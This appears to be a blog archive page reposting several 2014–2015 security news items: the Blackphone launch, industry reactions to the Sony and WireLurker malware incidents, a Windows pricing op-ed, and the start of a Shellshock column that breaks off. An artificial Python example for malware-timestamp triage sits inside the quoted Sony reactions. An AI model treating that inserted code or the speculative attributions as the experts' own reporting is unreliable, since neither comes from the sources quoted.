November 21, 2024

Silent Circle Unveils Enterprise Platform, New Devices

Posted on March 2, 2015 by in Security

Silent Circle Launches Enterprise Platform and New Devices Including Blackphone 2 and Blackphone+ Tablet

Silent Circle today unveiled two new devices as part of its Blackphone product line, along with a new enterprise platform that combines devices, software and services into a privacy- and security-focused mobile architecture.

New hardware unveiled by the company includes the Blackphone 2 and the privacy-focused Blackphone+ tablet.

Scheduled to be available in the second half of 2015, Blackphone 2 offers hardware improvements over its predecessor, including a faster 8-core processor, three times more RAM and a longer-lasting battery, the company said. The smartphone also integrates with existing Mobile Device Management systems and comes with a larger Full HD display.

Arriving later in 2015, the Blackphone+ tablet will offer privacy for mobile workers, the company said.

News of the enterprise platform and new hardware offerings comes just days after the company announced that it had agreed to buy out a joint venture with Geeksphone, giving Silent Circle a 100 percent ownership stake in SGP Technologies and full ownership of the privacy- and security-focused Blackphone product line.

Offerings and enhancements coming as part of the new platform include:

PrivatOS 1.1 – The first major upgrade to the Android-based operating system created by Silent Circle introduces Spaces, an OS-level virtualization and management solution that enables devices to separate work from play. Geared specifically for the enterprise, PrivatOS allows users to keep enterprise and personal apps separate, while enabling IT administrators to lock and wipe enterprise-managed ‘Spaces’ when necessary.

PrivatOS can also now integrate with several Mobile Device Management (MDM) platforms as a result of partnerships with Citrix, Soti and Good Technology.

Silent Suite, a set of core applications with peer-to-peer key negotiation and management, now includes Silent Meeting, a new, secure conference calling system that supports multiple participants. 

Additional services offered as part of the enterprise platform include:

Silent Store – Installed on all Blackphone devices, the world’s first privacy-focused app store features apps from the developer community vetted by Silent Circle.

Silent World – An encrypted calling plan that lets users communicate privately with those who don’t have Silent Phone. Silent World allows users to call anyone within the Silent Circle coverage areas privately, with no roaming charges or extra fees.

Silent Manager – Silent Manager gives enterprises a simple web-based solution for managing plans, users and devices.

“Traditional security solutions have failed global enterprise in a mobile world and make data and privacy breaches feel inevitable to most enterprises,” said Mike Janke, Co-Founder and Chairman of the Silent Circle Board at a press conference held at Mobile World Congress 2015 this morning. “What’s more, these breaches have evolved and have much broader impact. They now put every customer, employee and partner at risk. They are eroding the trust people have in enterprises. They have moved privacy firmly to the top of the boardroom agenda.”

“Enterprises have been underserved when it comes to privacy,” said Bill Conner, President and CEO of Silent Circle. “Traditional approaches to security have failed them. We’re here to fix that. We have to understand that to achieve real privacy now requires security plus policy. That new equation is driving everything we do in building the world’s first enterprise privacy platform.”

In May 2014, Silent Circle announced that it had decided to move its global headquarters from the Caribbean island of Nevis to Switzerland, in order to take advantage of the country’s privacy laws. 

Last week, the company also announced that it had raised approximately $50 million in a private, common equity round to support accelerated growth.

Mike Lennon, Managing Editor, SecurityWeek.

Industry Reactions to Devastating Sony Hack

Posted on December 5, 2014 by in Security

The systems of entertainment giant Sony have been hacked once again, and although the full extent of the breach is not yet known, the incident will likely be added to the list of most damaging cyberattacks.

Feedback Friday for December 5, 2014

A group of hackers called GOP (Guardians of Peace) has taken credit for the attack and claims to have stolen terabytes of files. Sony admitted that a large amount of information has been stolen, including business and personnel files, and even unreleased movies.

On Friday, security firm Identity Finder revealed that the attackers leaked what appears to be sensitive personal data on roughly 47,000 individuals, including celebrities.

North Korea is considered a suspect, but the country’s officials have denied any involvement, and Sony representatives have not confirmed that the attack was traced back to the DPRK.

Researchers from various security firms have analyzed a piece of malware that appears to have been used in the Sony hack. The threat is designed to wipe data from infected systems.

The FBI launched an investigation and sent out a memo to a limited number of organizations, warning them about a destructive piece of malware that appears to be the same as the one used in the attack against Sony.

Some experts believe the FBI sent out the alert only to a few organizations that were likely to be affected. Others have pointed out that the FBI doesn’t appear to have a good incident response plan in place.

And the Feedback Begins…

Cody Pierce, Director of Vulnerability Research at Endgame:

“The latest FBI ‘flash’ report warning U.S. businesses about potentially destructive attacks references malware that is not highly advanced. Initial reports associate the alert with malware that overwrites user data and critical boot information on the hard drive, rendering the computer effectively useless. Based on analysis of the assumed malware sample, no technology exists within the sample that would warrant a larger alert to corporations. Additional information, either present in the malware – like IP address or host information – or during the investigation, also likely made it clear who required advance notification. Because of the malware’s low level of sophistication as well as the reportedly targeted nature of the attacks, it is entirely reasonable that the FBI would only inform a small number of companies.

The goal of these coordinated alerts is to raise awareness to the most likely targets so that they can ensure their security readiness, without unnecessary burden to those unlikely to be affected. In this case, because the malware is targeted and not sufficiently advanced, the FBI’s approach is justified. Conversely, in the event that more sophisticated malware or a new attack vector had been discovered, greater communication would have been necessary. Based on the information available, the FBI made the right decision in issuing this particular alert.” 

Mark Parker, Senior Product Manager, iSheriff:

“For many organizations in the midst of breach investigation, decisions are often made very quickly. Without the luxury of planning meetings and impact analysis, some of the things are done in a ‘from the cuff’ manner based upon the evidence in hand, which may in fact be incomplete. In the case of the FBI memo that was sent out, it was done in a manner that was clearly done hastily. The threat posed by the malware was significant and a quick decision was made to send out an alert.

While I wasn’t in the room, I am fairly certain from having been in similar rooms, and in similar situations, that a list of who should receive the alert was not a very long conversation, and the point was to get the information out as soon as possible. What this demonstrates is that both Sony and the FBI do not have a good incident response plan in place for this type of incident. All organizations should have an incident response plan in place that lays out this sort of information in advance so that time is not spent on such issues. A clear process for key decisions is a very important part of any incident response plan, as is a list of who should be contacted in different situations.”

Steve Lowing, Director of Product Management, Promisec:

“Given that Sony Pictures is releasing a movie next month that satirizes assassinating North Korea’s supreme leader Kim Jong-Un, and after learning about this release last June declared war on the company, it’s widely held that the North Korean government is behind the attack. It’s likely that this is true at least at a sponsorship level given the number of attacks on South Korean banks and various businesses over the course of the last year, with the likely attackers being the country’s cyber warfare army known as unit 121.

Unit 121 is believed to be operating out of a Shenyang China luxury hotel giving them easy access to the world with being an arm’s reach from North Korea. The main reason for this is China’s close proximity to North Korea, North Korea’s almost non-existent internet access and China’s far superior network and cyber hacking resources. This is yet another example of State sponsored hacktivism targeting companies directly.”

Jonathan Carter, Technical Director, Arxan Technologies:

“So far, the evidence seems to suggest that the Sony hack was accomplished via execution of malicious malware. Hackers typically conduct these attacks by somehow tricking the user into executing something that is malicious in nature from within a system that is sensitive in nature. The recent iOS Masque and WireLurker vulnerabilities clearly illustrate that the delivery and execution of malicious code can take some very clever approaches. In light of these recent revelations, it is reasonable to expect to see a rise in distribution of malware (disguised as legitimate B2E apps that have been modified) via mobile devices owned by employees that have access to sensitive backend systems.”

Vijay Basani, CEO of EiQ Networks:

“It is possible that the hackers accessed not only unreleased movies, but also gained access to user accounts, celebrity passport details, sensitive trade secrets and know-how. This demonstrates that in spite of significant investments in traditional and next-gen security technologies, any network can be compromised. What is truly required is a total commitment from the senior management to building a comprehensive security program that delivers pro-active and reactive security and continuous security posture.”

Craig Williams, Senior Technical Leader and Security Outreach Manager for Cisco’s Talos team: 

“The recent FBI ‘flash alert’ was published covering the dangers of a new wiper Trojan that has received quite a bit of media attention. There are a few key facts that seem to be overlooked by many of the early news accounts of this threat:

Cisco’s Talos team has historic examples of this type of malware going back to 1998. Data *is* the new target; this should not surprise anyone – yet it is also not the end of the world. Recent examples of malware effectively “destroying” data – putting it out of victims’ reach – also include Cryptowall and Cryptolocker, common ransomware variants delivered by exploit kits and other means.

Wiping systems is also an effective way to cover up malicious activity and make incident response more difficult, such as in the case of the DarkSeoul malware in 2013.

Any company that introduced proper back-up plans in response to recent ransomware like Cryptolocker or Cryptowall should already be protected to a degree against these threats detailed by the FBI.  Defense-in-depth can also detect and defeat this type of threat.”

Carl Wright, general manager at TrapX Security:

“The FBI and other national government organizations have an alerting process that we are sure they followed to the letter. It is important for them to provide an early warning system for these types of attacks, especially in the case of the Sony breach, because of the severe damage that could ultimately be used against our nation’s critical infrastructure.

Timely information sharing must be completely reciprocal in nature, meaning, corporations also have to be willing to share their cyber intelligence with the government.

When we look at the significant incidents of 2014 and in particular Sony, we see that most enterprises are focusing efforts and investments on breach prevention. 2014 has clearly highlighted the need for corporations and government to include additional technological capabilities that better detect and interdict breaches before they can spread within an organization.”

Ian Amit, Vice President, ZeroFOX:

“The Sony breach is a tricky situation. How it occurred is still up for debate – possibly nation state? Possibly an insider? Possibly a disgruntled employee? Regardless, it’s clear the breach goes very deep. It has gotten to the point that Sony is outright shutting down its network. This means even the backups are either nonexistent or compromised, and the hackers likely got just about everything, making this one of the worst breaches ever at an organization of this size. The attack touches anyone involved with Sony – auditors, consultants, screenwriters, contractors, actors and producers. The malware might be contained on Sony’s servers, but the data loss is much further reaching. Make no mistake, this breach is a big one.

I am skeptical this attack is nation state-level attack. The idea that North Korea is retaliating against Sony for an upcoming film is a wildly sensationalist explanation. Hackers regularly cover their trails by leaving red herrings for the cleanup crew – indications that the Russians, Chinese, Israelis, North Koreans and your grandmother were all involved. A small script of Korean language is hardly damning evidence. Code can be pulled from a variety of sources and there is no smoking gun (yet) in the case of the Sony breach.”

Oliver Tavakoli, CTO, Vectra Networks:

“Any malware that destroys its host will have limited impact unless it is part of a larger coordinated attack. One or two laptops being wiped at Sony would be a nuisance, but large numbers of devices being wiped all at once is devastating. The latter style of attack requires an attacker to achieve a persistent network-level compromise of the organization before the wiper malware even becomes relevant.

The information released as part of the FBI alert bears this out. The malware sample detailed in the alert was compiled only days before it was used. This is a strong sign that Sony was compromised well before the time the malware was built, and the wiper malware was the coup de grâce at the end of the breach.

This is particularly significant when evaluating the FBI alert. Sharing indicators of compromise (IoC) is a good thing, and the industry needs more of this sharing. But we need to keep in mind that these particular indicators represent the absolute tail end of a much longer and widespread attack. In fact, some of the IoCs detailed in the alert are only observable once the wiper malware has begun destroying data. Obviously, this sort of indicator is much too late in the game, but too often is the only indicator that is available. What the industry needs badly are indicators of attack that reveal the compromise of the organization’s network at a point when security teams can still prevent damage.”
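The compile-time reasoning in the statement above can be checked mechanically during triage. As an added example (not code from the article or from any vendor quoted in it), the following Python routine reads the TimeDateStamp from a PE file's COFF header, compares it with the time the sample was first observed, and flags the "built only days before use" pattern as well as zero or future timestamps that cannot be trusted. The PE bytes, the first-seen date and the 14-day threshold are all constructed for the example, not values from the alert.

```python
import struct
from datetime import datetime, timedelta, timezone

PE_SIGNATURE = b"PE\x00\x00"


def pe_compile_time(data: bytes) -> datetime:
    """Return the COFF TimeDateStamp of a PE image as an aware UTC datetime.

    Layout relied on: 'MZ' at offset 0, e_lfanew (uint32) at 0x3C pointing at
    'PE\\0\\0', followed by the 20-byte COFF header in which TimeDateStamp is the
    uint32 at offset 4 (after Machine and NumberOfSections, 2 bytes each).
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("not a PE image: bad PE signature offset")
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def assess_build_gap(compile_time: datetime, first_seen: datetime,
                     max_days: int = 14) -> str:
    """Classify the gap between build time and first observation.

    'forged'     : stamp is zero or later than first_seen; the linker value was
                   cleared or tampered with and must not drive the timeline.
    'late_stage' : built within max_days of first use; a tool built this close
                   to deployment suggests the intrusion predates the tool, so
                   the hunt must look for earlier footholds, not just this IoC.
    'older_tool' : built well before first use.
    """
    if compile_time.timestamp() == 0 or compile_time > first_seen:
        return "forged"
    gap = first_seen - compile_time
    return "late_stage" if gap <= timedelta(days=max_days) else "older_tool"


def build_stub(stamp: int) -> bytes:
    """Construct a minimal PE header (headers only, not a runnable executable)
    carrying the given TimeDateStamp. Used to fabricate test input offline."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header follows DOS header
    # COFF header: Machine (I386), NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x014C, 1, stamp, 0, 0, 0, 0)
    return bytes(dos) + PE_SIGNATURE + coff


# Constructed scenario (not the real sample's dates): first seen on
# 2014-11-24, with the binary linked three days earlier.
FIRST_SEEN = datetime(2014, 11, 24, tzinfo=timezone.utc)
SAMPLE = build_stub(int(datetime(2014, 11, 21, tzinfo=timezone.utc).timestamp()))


def triage(data: bytes, first_seen: datetime = FIRST_SEEN) -> dict:
    """Summarise the build-to-first-seen gap for one PE sample."""
    compiled = pe_compile_time(data)
    return {
        "compiled": compiled.isoformat(),
        "gap_days": (first_seen - compiled).days,
        "verdict": assess_build_gap(compiled, first_seen),
    }


if __name__ == "__main__":
    print(triage(SAMPLE))
```

A 'late_stage' verdict is a prompt to widen the investigation window, not a finding in itself: the stamp only says when the linker ran, and a 'forged' stamp says nothing about the timeline at all.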

Kenneth Bechtel, Tenable Network Security’s Malware Research Analyst:

“This type of attack is not new, it’s been around for a long time, with multiple examples. The most recent similarity is the ransomware that’s been attacking systems. These attacks are often difficult to detect prior to the execution of the payload. The best thing is a good backup scheme as part of your response. Many times the answer to modern malware infections is to reimage the system. In case this occurs on your system, a reimage is often the best response. The only thing that reimaging would not solve is having most current data like documents and spreadsheets. It’s this combination of reimaging and restoring backups that is the most efficient response to the attack. While this ‘fixes’ the host, network forensics should be done to identify the attack and create defenses against the attack in the future.”

Jon Oberheide, CTO, Duo Security:

“I don’t believe that the limited distribution of the FBI warning was improper. But, I think the scope and focus on data-destroying malware was a bit misguided.

Certainly data loss can have a big impact on the operations of a business. We saw that big time back in 2012 with the Saudi Aramco attack by data-wiping malware. But, regardless of whether the data loss is intentional or inadvertent, it’s vital to have proper disaster recovery and business continuity processes in place to be able to recover and continue operation. However, when considering a sophisticated cyber-attack, disaster recovery processes must assume that an attacker has more capabilities and reach than standard inadvertent data loss events. For example, an attacker may have access to your data backup infrastructure and be able to destroy backups as well. So, modern organizations may have to revisit their DR/BC models and take into account these new threat models.

The real impact of the Sony breach is not the destruction of data, but the longer term effects of confidentiality and integrity of their data and infrastructure. Rebuilding all their infrastructure post-breach in a trusted environment is an incredibly challenging and arduous task. The disclosure of credentials, infrastructure, critical assets, employee PII, and even things like RSA SecurID token seeds will have a much longer-term, but more under-the-radar, impact on Sony’s business.

Most importantly, in the modern day, breaches don’t only impact the directly-affected organization, but they tend to sprawl out and negatively impact the security of all organizations and the Internet ecosystem as a whole. A breach doesn’t happen in a vacuum: stolen credentials are re-used to gain footholds in other organizations, stolen source code is used to find vulnerabilities to assist future attacks, and information and experience is gleaned by attackers to hone their tactics, techniques, and procedures.”

Idan Tendler, CEO of Fortscale:

“The traditional concept for security was to keep the most important resources, i.e. the vaults with the cash (or in Sony’s case, films) safe. What we’re seeing with breaches of this magnitude is that the harm now goes far beyond any immediate and limited capital damage. Leaked sensitive information regarding employee salary and healthcare has the potential to cause enormous reputational harm and internal turmoil within a workforce. Revealing that kind of data can lead to jealousy, resentment and distrust among workers and create a very toxic work environment.

With news of passwords to sensitive documents also being leaked, Sony will need to be more vigilant in securing user access to resources by constantly monitoring and analyzing user activity for possible credential abuse.”

Clinton Karr, Senior security specialist at Bromium:

“These attacks are troublesome, but not surprising. Earlier this year we witnessed Code Spaces shutdown after a successful attack destroyed its cloud back-ups. Likewise, the evolution of crypto-ransomware suggests attackers are targeting the enterprise with destructive attacks. These attacks are unlike the “cat burglary” of Trojan attacks, but much more brute force like a smash-and-grab or straight vandalism.”

Ariel Dan, Co-Founder and Executive VP, Porticor:

“Reporting the technical details of a specific attack is a sensitive topic. Attack details can and will be used by new hackers against new targets. On the other hand, companies can’t do much to defend against a type of attack they know very little about. One relevant example of such a potential attack was around a severe security bug in the Xen virtualization system that exposed cloud users of Amazon Web Services, Rackspace and other cloud providers. The cloud vendors had stealthily patched affected systems, issued a vague notification to their users of an immediate restart action, and only after it was all done was the attack realized and publicized. Reporting the bug prior to fixing the problem would have a devastating effect on cloud users.

Back to the Sony attack: I personally believe that reporting the entire details of a security breach can do more harm than good, but there should be a way to communicate enough meaningful information without empowering the bad guys. Blogs like KrebsonSecurity provided additional details, including a snort signature to detect this specific attack. Such data is meaningful for the defender and does not help an attacker. From this information we learned that organizations should embrace an “encrypt everything” approach as we step into 2015. We should be able to guarantee that data is not exposed even if an organization has been infiltrated.”

Tim Keanini, CTO at Lancope:

“I think the question being asked here is a great opportunity to describe the threats of yesterday versus the threats we face today.  In the past, broad advisories on technical flaws were effective mainly because the problem was universal.  Attackers would automate tools to go after technical flaws and there was no distinction between exploitation of a large corporation or your grandmother. If the vulnerability existed, the exploitation was successful.  In the case of Sony, we are talking about a specific adversary (Guardians of Peace) targeting Sony Pictures and with specific extortion criteria.  With this type of advanced threat, warnings sent out by the FBI on the investigation itself will be less prescriptive and more general making its timeliness less of a priority. 

From everything we have seen disclosed so far, it is difficult to assess and advise on the information security practice when some of the flaws exploited seem to suggest very little security was in place. The analogy would be: it would be hard to assess how the locks were compromised when the doors to host the locks were not even present. For example, some of the disclosure on reddit earlier in the week suggests that some files named ‘passwords’ were simply in the clear and stored unencrypted in txt and xls files. The investigation will determine the true nature of all of this speculation but I use this as an example because the FBI could issue a warning every day of the week that said “Don’t do stupid things” and be just as effective.

The lesson learned here is that if you are connected to the Internet in any shape or form, this type of security breach happening to you and your company is a very real risk. Step up your game before you become the subject of another story just like this. It would be weird but Sony Pictures should write a movie on how a cybercrime group completely compromised and held an entertainment company for cyber extortion – categorized under non-fiction horror.”

Kevin Bocek, Vice President of Security Strategy & Threat Intelligence at Venafi:

“As the FBI, DHS and others investigating the Sony hack work furiously to uncover the details and the threat actors behind this breach, it’s important that we recognize the attack patterns that are right in front of our face: cybercriminals are and will continue to use the same attack blueprint over and over again. Why? Because they use what works.

In April 2011, Sony’s PlayStation Network was breached where asymmetric keys were stolen, compromising the security of 77 million users’ accounts. Now, nearly four years later, Sony is still facing the same threat — only this time it’s directed on Sony Pictures Entertainment. In this latest breach, cybercriminals successfully gained access to dozens of SSH private keys – the same way they stole private keys in the Mask, Crouching Yeti and APT18 attacks. Once these keys are stolen, the attackers can get access to other systems — and then it just goes from bad to worse. It’s critical that incident response and security teams realize that the only way that the attackers can *truly* be stopped from accessing these systems is by replacing the keys and certificates. Until then, they will continue to wreak havoc and cause more damage with elevated privileges, the ability to decrypt sensitive data in transit, and spoof systems and administrators. All it takes is one compromised key or vulnerable certificate to cause millions in damages. Hopefully, Sony will learn its lesson this go round.”

Until Next Friday… Have a Great Weekend!

Previous Columns by Eduard Kovacs:

Feedback Friday: WireLurker Malware Targets Mac OS X, iOS – Industry Reactions

Posted on November 8, 2014 by in Security

Researchers at Palo Alto Networks identified a new piece of malware designed to target Mac OS X and iOS users. The threat, called WireLurker, has potentially affected hundreds of thousands of users, almost all of them located in China. 

Cybercriminals are distributing the threat by trojanizing OS X apps hosted on third party app stores. The 467 malicious apps uploaded to the Maiyadi App Store have been downloaded more than 350,000 times.

Feedback Friday: WireLurker Malware

Once it infects a Mac, the malware downloads other malicious iOS applications to the infected machine. When victims connect their iPads, iPhones or iPods via USB to the infected device, WireLurker installs the downloaded iOS applications onto them. The mobile component of WireLurker is capable of stealing information from infected devices.

The latest version of WireLurker is interesting because it can infect not only jailbroken devices, but also ones that haven’t been jailbroken. The threat can install the malicious iOS apps on non-jailbroken devices by signing them with a stolen code signing certificate.

Shortly after Palo Alto Networks disclosed details on WireLurker, researchers identified an older variant of the threat apparently designed to target computers running Microsoft Windows. 

The command and control servers used by the malware are currently offline and Apple has revoked the certificate used by the malware authors. However, experts believe WireLurker once again shows that Apple devices are not immune to malware.

And the Feedback Begins…

Ian Amit, Vice President of ZeroFOX:

“It’s interesting to see how malware is getting more holistic from an attack vector approach, utilizing technical vulnerabilities and elements, as well as human ones. This isn’t the first malicious code that is designed to “hop” between connected platforms, examples date back to variants such as Stuxnet that infected Windows based computers, which in turn affected Siemens PLCs. This is an interesting turn of events, as Apple’s iPhone is commonly considered a safe platform as long as it isn’t jailbroken.

Beyond the already familiar abuse of social interactions that allow the malware to run in the first place – essentially, having the victim ‘knowingly’ install it – WireLurker also abuses the trust between the victim’s PC and the iPhone connected to it, which grants it full access to the phone and its applications – apps can be backed up over USB, then restored to the phone, after the malware has modified them and inserted a backdoor.”

Greg Martin, CTO of ThreatStream:

“Wirelurker is being distributed via a 3rd party app-store called Maiyadi that is out of control of Apple.

The danger with third-party app stores such as Maiyadi is that Apple and Google have no vetting control of what gets added to 3rd party app stores, severely limiting their ability to protect end-users from running malicious apps. In fact nearly all cases of known malware for the iPhones have originated from 3rd party app stores such as Cydia (App store for jailbroken iPhones) and now new ones like Maiyadi.

Monitoring these 3rd party app stores for malicious apps will become an opportunity for cyber security companies to help provide intelligence back to Apple and Google on what’s happening outside of their control.”

Steve Bell, security consultant, BullGuard:

“The really interesting thing about the WireLurker malware is the scale of the infection and how it is promulgated.  Because of the proprietary nature of Apple devices and the fact that apps are checked for malware before they go into the Apple store users have generally been protected in the past.

However, with an estimated 350,000 downloads of infected apps and the fact that the malware can also transfer via a USB port, this signals a serious notching up of hackers’ endeavours to hit Apple devices. In the US Apple users tend to stick to the Apple store, which is wise. WireLurker shows precisely the danger of downloading apps from unregulated third party stores.

However, the use of a USB port to also transfer malware, while obvious and simple, could be potentially devastating. Without wishing to be alarmist, USB ports are an obvious vulnerability, and it’s not beyond the realms of possibility that hackers might use this to insert Trojans designed to lie dormant for a period. With Apple now putting its considerable weight behind Apple Pay, hackers have serious motivation.”

Carl Wright, General Manager for TrapX Security:

“What has enabled the success of the creators of WireLurker is the concept of transitive trust. This two-way approved relationship automatically created between parties has long been an Achilles heel to security professionals trying to ensure the validity of transactions on a more or less case by case basis.

This recent hack continues to illustrate the trade-off the end users must consider between that of maintaining security of the end point device and innovative new applications that may not be developed or certified by Apple.

In the end, the price may indeed be too extreme for corporations who desire to take advantage of end user BYOD.”

Jared DeMott, Security Researcher with Bromium Labs:

“People still seem to think malware on the Mac is less likely than on Windows. If this is true, it’s simply because attackers are less interested in Mac. The relative attack surface is just as big (similar chance to find and exploit bugs) as on Windows or any other modern operating system.

In fact, my suspicion is that Macs really are exploited more than people realize.  But it’s either typically by better funded attackers, who know how to stay hidden, or because Apple in general does a better job at managing bad security press when compared to Windows.

This particular malware is distributed not in the form of an exploit, but in the form of pirated software.  China in particular, is known to run a lot of illegal software.  Thus, it’s not surprising the Chinese took the brunt of this round, considering the deployment mechanism.”

Mark Parker, Senior Product Manager, iSheriff:

“Wirelurker introduces a new threat vector in a place that was thought to be secure. The concept of using trojan software to download new threats is not new, that is something that has been in practice for many years. However, up to this point the software on iOS devices has been considered secure since the only software on the device would come through the heavily vetted Apple App Store.

By using the workstation’s USB connection as an avenue to surreptitiously install the Trojan applications, the protection afforded by the App Store is leap frogged in an effective manner. Since it has shown success, there is sure to be more advancement and copycats. The introduction of the mobile phone as a method of payment will increase the potential for attacks. Wherever there is money, there is always going to be Malware built to try to get access to that money.

This approach of using the workstation USB connection to another device could also be used in other “closed system” environments. Examples of this could be physical security system maintenance, or point-of-sale terminals that can only be maintained via a workstation USB connection, or similar method. It is always important to ensure that all workstations, even those of workers off-site, are protected from endpoint, web, and email based attacks at all times. The need for security doesn’t stop when the device leaves the network, especially in cases of workers that will be connecting to these types of devices.”

Kenneth Bechtel, Malware Research Analyst, Tenable Network Security:

 “With a resurgent BlackEnergy now targeting network routers and WireLurker spreading like wildfire across China’s iOS devices, this has been an interesting week to be in the malware business. But the thing to keep in mind is that despite the hype, neither of these threats herald an impending Internet apocalypse, though both deserve to be taken seriously.

WireLurker infects iOS through compromised OS X machines. Following successful malware trends, it is modular and updateable, having 467 applications hosted on the Maiyadi App Store (a third-party store hosted in China). This threat can now infect non-jailbroken iOS devices simply by connecting an iPhone/iPad/iPod to a computer to sync the calendar or contacts list. This concept is very frightening to many users, and means it won’t be long before it spreads to countries outside of China.”

Michael Sutton, VP of Security Research for Zscaler:

 “We keep waiting for mobile malware to eclipse traditional PC malware but it turns out that we’re waiting for the wrong thing. We’ll never see the drive by downloads and fast spreading device to device malware that we’ve become accustomed to in the Windows world, due to the differing architectures of Windows vs Mobile operating systems. That doesn’t however mean that malware on mobile devices isn’t a concern, it just means that malware is being forced to evolve and adapt to a more restrictive environment.

This is especially true for iOS devices and WireLurker represents a new advance on that front. Whether or not Apple designed its Walled Garden for security purposes, the fact that iOS apps must primarily be installed only from the iOS App Store, where they can first be vetted by Apple, has made malicious apps on non-jailbroken devices a rare commodity. WireLurker took advantage of an exception to this rule.

WireLurker abuses the fact that there is another way to get apps onto non-jailbroken devices. Apple allows enterprise development teams to leverage Enterprise Provisioning as a means to push homegrown apps to employees without the hassle of hosting them in the App Store. The process is still restricted and requires the use of an Apple-supplied code signing certificate and provisioning profiles pushed to devices, but it does provide an alternative. The authors of WireLurker appear to have stolen a legitimate code signing certificate from Hunan Langxiong Advertising Decoration Engineering Co. Ltd., in order to push apps to non-jailbroken devices via provisioning profiles.”

Steve Hultquist, chief evangelist at RedSeal:

“Trust. It’s the first requirement for security, but seldom considered by consumers. In the case of WireLurker, existing trust between an iOS device and a Mac becomes the surrogate for malware to infect the devices. When the Mac user mistakenly places trust in a third-party app site to only offer uninfected applications for download, it opens the door to infection of the Mac and then the iOS devices.

This is another example of the sophistication and automation of attacks that are growing inexorably into the future. Attackers are both more subtle and more capable than ever before. This attack resulted in over a quarter of a million infected downloads, in all likelihood impacting thousands of people and devices, all because of misplaced trust.

This attack and others that will follow underscore the need for proactive security efforts, from application design-for-security to trust architectures and automated analysis of potential access paths. Without automated proactive prevention, attacks will continue to grow in volume and impact. Enterprises need to take notice, since these consumer attacks are merely the ice above the water. The enterprise and governmental attacks are the bulk under the sea.”

Until Next Friday…Have a Great Weekend!

Previous Columns by Eduard Kovacs:

SecurityWeek RSS Feed

The future of Microsoft depends on Windows being free

Posted on October 13, 2014 by in Microsoft Windows

Remember the days when you would head out to the shop to pick up the latest version of Windows, on DVD, for something like $130? Or, if you were unlucky enough not to get upgrade pricing, perhaps even $239? Those days may seem like the distant past, but in truth Microsoft is still charging for upgrades between major versions even as of Windows 8.1. Yet this isn’t going to be the future of Microsoft; the days of charging for upgrades are over, and the company is slowly being backed into a corner by the model of free upgrades on mobile, as well as Apple entirely removing OS upgrade pricing on the Mac. Consumers simply aren’t willing to pay for upgrades any longer; instead, they expect them to be free for most of the lifetime of a device.

The value of OS upgrades has been entirely lost in a time when we’re used to getting free updates to our phones for as long as they can keep up with the software. Why does this same model not yet apply to the PC? Microsoft has already adopted free upgrades for Windows Phone, so why not for the PC?

Microsoft has remained quiet on what its plans for Windows pricing are in future, but it did make it free for customers to upgrade from Windows 8 to 8.1, and we understand the upgrade from 8 to 10 will be free, but will this continue? The company recently revealed Windows 10 but didn’t detail whether it would be another free upgrade or not; however, it probably should be a free upgrade for most Windows users.

Microsoft needs to decouple the business and consumer markets if it wishes to maintain its iron grip on the future PC market. It’s entirely reasonable to expect businesses to pay for licensed software, even if only to get extended updates and support, but expecting the end user to care enough to spend over $100 to upgrade every two years is absurd.

For many consumers, Windows upgrades are directly tied to when they replace their PCs. Why else would so many people not even bother to upgrade from XP? Their PCs are perfectly capable of running Windows 7, but why would they want to pay $130 just to get the latest software? Change can be hard, and rather than bothering to pay for a new license and upgrade, these users have chosen to stay on unsupported versions because it ‘works’ fine.

Making Windows free has a number of tangible benefits for Microsoft: not only does it encourage users to upgrade frequently (and removes almost all barriers to doing so), it means that users are more likely to use the latest version of Microsoft products and associated services. It also means that Microsoft could eliminate all the confusing and unnecessary SKU options and concentrate on two markets: consumer and enterprise.

Imagine Windows 10 were made free for all users from Vista and up: the install base would rapidly move to the latest version (just as OS X users, or iOS users, flock to the latest release), meaning less legacy support for Microsoft and the ability to promote bigger numbers. The company could simply have a different edition, and a charge, for those using Windows in business settings.

Because it would be free for many home users to get the latest version of Windows, it seems likely that these same users would be more willing to pay for associated services via subscription instead, like OneDrive or Office 365, which would add up to a lot more recurring revenue for the company.

I expect that Microsoft has already come to this same, inevitable conclusion and will make Windows 10 free for those using Windows 7 and up. It’s likely a hard decision for the company, since Windows is a $5 billion a year business, but it’s a crucial one that it has to make in order to stay relevant.

As fewer and fewer PCs are sold each year, the company must look for other ways to make money by offering supporting services on a longer-term basis, rather than trying to persuade people to drop the cash on an upgrade every three years.

Consumers simply aren’t buying new computers any longer, as the machines last longer or people switch to depending on phones and tablets, so Microsoft has to seek new ways of generating revenue beyond Windows. Windows will become the conduit for consumers to buy Microsoft services.

The days of paid Windows upgrades have met their end, even if Microsoft hasn’t admitted it yet.

Photo credit: Getty Images

  • By Owen Williams, thenextweb.com

Feedback Friday: ‘Shellshock’ Vulnerability – Industry Reactions

Posted on September 28, 2014 by in Security

The existence of a highly critical vulnerability affecting the GNU Bourne Again Shell (Bash) has been brought to light this week. The security flaw is considered by some members of the industry as being worse than the notorious Heartbleed bug.

GNU Bash is a command-line shell used in many Linux, Unix and Mac OS X operating systems. The vulnerability (CVE-2014-6271) has been dubbed “Bash Bug” or “Shellshock” and it affects not only Web servers, but also Internet-of-Things (IoT) devices such as DVRs, printers, automotive entertainment systems, routers and even manufacturing systems.

By exploiting the security hole, an attacker can execute arbitrary commands and take over the targeted machine. Symantec believes that the most likely route of attack is through Web servers that use CGI (Common Gateway Interface), which passes request data such as headers to scripts through environment variables. There have already been reports of limited, targeted attacks exploiting the vulnerability.

A patch has been made available, but it’s incomplete; the follow-up issue is tracked as CVE-2014-7169. Until a complete fix is rolled out, several organizations have released Shellshock detection tools. Errata Security has started scanning the Web to find out how many systems are affected, and Symantec has published a video to demonstrate how the flaw can be exploited.

The security community warns that the vulnerability can have serious effects, and points out that it could take a long time until all systems are patched.

And the Feedback Begins…

Ian Pratt, Co-founder and EVP at Bromium:

